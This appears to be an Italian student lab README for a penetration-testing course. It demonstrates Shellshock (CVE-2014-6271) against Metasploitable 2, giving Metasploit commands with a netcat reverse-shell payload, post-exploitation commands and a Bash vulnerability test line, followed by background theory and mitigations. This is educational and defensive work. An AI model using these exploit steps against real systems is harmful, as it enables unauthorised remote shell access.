
# Laboratorio didattico che dimostra lo sfruttamento di Shellshock (CVE-2014-6271) tramite Metasploit contro Metasploitable 2, includendo scansione, sfruttamento, reverse shell e strategie di mitigazione.
Questo è il compito pratico per Vulnerability Assessment and Penetration Testing – II, incentrato sullo sfruttamento e l'analisi della vulnerabilità Shellshock (CVE-2014-6271).
Condotto in un ambiente di laboratorio controllato utilizzando Metasploitable 2 (target) e Kali Linux (attaccante).
nmap -sS -sV <target-ip>
2️⃣ Avvia Metasploit
msfconsole
3️⃣ Carica il Modulo di Exploit
use exploit/multi/http/apache_mod_cgi_bash_env_exec
4️⃣ Configura l'Exploit
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
5️⃣ Esegui l'Exploit
exploit
📸 Dimostrazione Include
📡 Risultati scansione Nmap
⚙️ Configurazione Metasploit
🔄 Output del reverse shell
🛠 Comandi post-exploitation:
whoami
uname -a
ifconfig
📖 Background Teorico Cos'è Shellshock?
Shellshock è una vulnerabilità nella shell GNU Bash che consente agli attaccanti di eseguire comandi arbitrari iniettandoli in variabili d'ambiente. Scoperta a settembre 2014 e assegnata come CVE-2014-6271, colpisce Bash v1.14 fino a v4.3. Come Funziona
Bash elabora erroneamente le definizioni di funzione nelle variabili d'ambiente ed esegue comandi extra dopo il corpo della funzione. Nei server web che utilizzano script CGI, le intestazioni HTTP diventano variabili d'ambiente, creando un percorso di attacco facile.
Esempio:
env x='() { :;}; echo vulnerable' bash -c "echo test"
Se vulnerabile, stampa vulnerable. Impatto
Esecuzione Remota Completa di Codice (RCE) senza autenticazione
Sfruttabile tramite semplici richieste HTTP
Utilizzato in botnet, worm, attacchi mirati
Ha colpito milioni di server, router e dispositivi IoT
Exploit Reali
Server Yahoo – Malware tramite script CGI
Botnet Wopbot – Sfruttamento automatizzato
QNAP NAS – Accesso remoto alla shell e malware
Worm Auto-Replicanti – Diffusione verso nuovi host vulnerabili
🛡 Prevenzione e Mitigazione
🔄 Aggiornare Bash immediatamente
🚫 Disattivare script CGI inutilizzati
🔥 Usare firewall per bloccare traffico non necessario
🛡 Implementare Web Application Firewall (WAF)
📜 Monitorare i log delle richieste HTTP
👤 Applicare il principio del minimo privilegio
⚠️ Disclaimer
Questo progetto è a solo scopo educativo. Tutti i test sono stati condotti in un ambiente di laboratorio controllato. ❌ Non utilizzare queste tecniche su sistemi senza autorizzazione.
👨💻 Autore: Janith Madhusankha 🎓 Corso: BICT (Hons) in Network & Security 🏫 Istituzione: South Eastern University of Sri Lanka